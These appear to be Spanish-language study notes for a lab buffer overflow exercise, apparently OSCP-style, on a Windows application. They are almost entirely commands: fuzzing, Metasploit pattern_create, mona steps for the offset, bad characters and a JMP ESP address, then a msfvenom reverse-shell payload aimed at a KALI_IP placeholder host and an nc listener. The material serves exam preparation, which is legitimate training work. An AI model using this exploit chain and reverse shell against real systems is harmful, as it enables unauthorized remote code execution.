python3 fuzzer.py
/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1100
Copiamos esto a payload en el exploit.py
Reiniciamos app
python3 exploit.py
!mona findmsp -distance 1700
Offset es 1274
Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de "BBBB"
!mona bytearray -b "\x00"
python3 bad_characters.py
Lo que sale del comando arriba lo ponemos en payload
!mona compare -f C:\mona\oscp\bytearray.bin -a <address>
Los bad chars son los siguientes:
00 11 12 40 41 5f 60 b8 b9 ee ef
Donde dice ESP le damos click derecho y Follow in Dump
Quitamos el 11 del payload en el script
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40
Quitamos el x40 del payload en el script
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f
Quitamos el x5f del payload en el script
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8
Quitamos el xb8 del payload en el script
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8\xee
Quitamos el xee del payload en el script
Reiniciamos app
python3 exploit.py
Donde dice ESP le damos click derecho y Follow in Dump
Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8\xee
!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"
Agarramos el numero 62501203
cambiamos el rtn y iniciamos payload='' esto en exploit.py
msfvenom -p windows/shell\_reverse\_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -f c
Agregamos a lo que sale en el comando anterior y ese valor es de payload en el exploit.py
padding = "\x90" * 16
nc -lvnp 4444